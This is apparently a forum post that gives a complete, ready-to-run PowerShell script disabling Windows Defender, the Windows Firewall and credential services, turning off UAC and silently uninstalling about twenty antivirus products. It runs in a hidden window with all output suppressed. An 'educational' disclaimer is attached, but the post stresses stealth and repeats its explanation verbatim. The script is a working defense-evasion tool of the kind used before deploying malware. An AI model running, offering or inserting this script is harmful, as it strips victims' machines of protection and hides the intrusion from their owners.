Today, I will be sharing with you a comprehensive script designed to disable a broad range of security features in a Windows environment, including both native Windows services and third-party security solutions.
This script is intended strictly for educational purposes, to illustrate how various Windows security features operate and can be manipulated. It is strongly advised against using this script in a live, production environment, as it will significantly reduce the security posture of the system, leaving it vulnerable to potential threats.
Now let's dive into the details:
The script starts by defining a list of services to disable. These services include those related to Windows Defender, Windows Firewall, Credential Manager, Software Protection, and more.
Following that, a range of registry keys under 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' and 'HKLM:\System\CurrentControlSet\Services\Netman' are modified to disable various features of Windows Defender and network connections.
Next, the script identifies a list of third-party security applications like McAfee, AVG, Symantec, Webroot, and others, and attempts to uninstall them. This is achieved using the WMI (Windows Management Instrumentation) interface to find and uninstall these applications.
In the final steps, the script disables the User Account Control (UAC) and various Windows Defender features, once again by manipulating registry keys and using PowerShell commands.
Here's the twist - the script is designed to run silently. It achieves this by using the "-WindowStyle Hidden" option for the PowerShell process, and redirecting all output to null (> $null). This means the script will run in a hidden window, and suppress all output, making its activities invisible on the surface. However, do note that some operations like uninstalling applications may still cause visible activities or prompts.
The script can be modified as you see fit.
Disabling security services will expose the system to potential threats, so it's crucial to understand the implications of each step in the script below.
Stay curious, and keep learning!
This script is intended strictly for educational purposes, to illustrate how various Windows security features operate and can be manipulated. It is strongly advised against using this script in a live, production environment, as it will significantly reduce the security posture of the system, leaving it vulnerable to potential threats.
Now let's dive into the details:
The script starts by defining a list of services to disable. These services include those related to Windows Defender, Windows Firewall, Credential Manager, Software Protection, and more.
Following that, a range of registry keys under 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' and 'HKLM:\System\CurrentControlSet\Services\Netman' are modified to disable various features of Windows Defender and network connections.
Next, the script identifies a list of third-party security applications like McAfee, AVG, Symantec, Webroot, and others, and attempts to uninstall them. This is achieved using the WMI (Windows Management Instrumentation) interface to find and uninstall these applications.
In the final steps, the script disables the User Account Control (UAC) and various Windows Defender features, once again by manipulating registry keys and using PowerShell commands.
Here's the twist - the script is designed to run silently. It achieves this by using the "-WindowStyle Hidden" option for the PowerShell process, and redirecting all output to null (> $null). This means the script will run in a hidden window, and suppress all output, making its activities invisible on the surface. However, do note that some operations like uninstalling applications may still cause visible activities or prompts.
The script can be modified as you see fit.
Disabling security services will expose the system to potential threats, so it's crucial to understand the implications of each step in the script below.
Stay curious, and keep learning!
Код:
@echo off
powershell.exe -WindowStyle Hidden -Command "
$windowsServices = @(
'WdBoot',
'WdFilter',
'WdNisDrv',
'WdNisSvc',
'WinDefend',
'SecurityHealthService',
'mpssvc',
'SharedAccess',
'KeyIso',
'VaultSvc',
'sppsvc',
'CertPropSvc',
'SCPolicySvc'
)
foreach ($service in $windowsServices) {
Set-Service -Name $service -StartupType 'Disabled' > $null
}
$registryPaths = @(
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet',
'HKLM:\System\CurrentControlSet\Services\Netman'
)
$registryValues = @{
'DisableAntiSpyware' = 1;
'DisableAntiVirus' = 1;
'MpEnablePus' = 0;
'DisableBehaviorMonitoring' = 1;
'DisableIOAVProtection' = 1;
'DisableOnAccessProtection' = 1;
'DisableRealtimeMonitoring' = 1;
'DisableScanOnRealtimeEnable' = 1;
'DisableEnhancedNotifications' = 1;
'DisableBlockAtFirstSeen' = 1;
'SpynetReporting' = 0;
'SubmitSamplesConsent' = 0;
'Start' = 4;
}
foreach ($path in $registryPaths) {
if (!(Test-Path -Path $path)) { New-Item -Path $path -Force > $null }
foreach ($key in $registryValues.Keys) {
New-ItemProperty -Path $path -Name $key -Value $registryValues.$key -PropertyType 'DWORD' -Force > $null
}
}
$programs = @(
'Webroot SecureAnywhere',
'Symantec Endpoint Protection',
'AVG 2015',
'McAfee VirusScan Enterprise',
'McAfee Agent',
'McAfee DLP Endpoint',
'McAfee Endpoint Security Platform',
'McAfee Endpoint Security Threat Prevention',
'Microsoft Security Client',
'Malwarebytes Managed Client',
'Sophos System Protection',
'Sophos AutoUpdate',
'Sophos Remote Management System',
'McAfee SiteAdvisor Enterprise',
'Symantec Backup Exec Remote Agent for Windows',
'ESET File Security',
'Norton AntiVirus',
'Kaspersky Anti-Virus',
'Avast Antivirus',
'Bitdefender Antivirus'
)
foreach ($program in $programs) {
$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $program }
if ($app) { $app.Uninstall() > $null }
}
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0
Set-MpPreference -DisableRealtimeMonitoring $true > $null
Uninstall-WindowsFeature -Name Windows-Defender -Quiet -Restart > $null
" > $null
Последнее редактирование: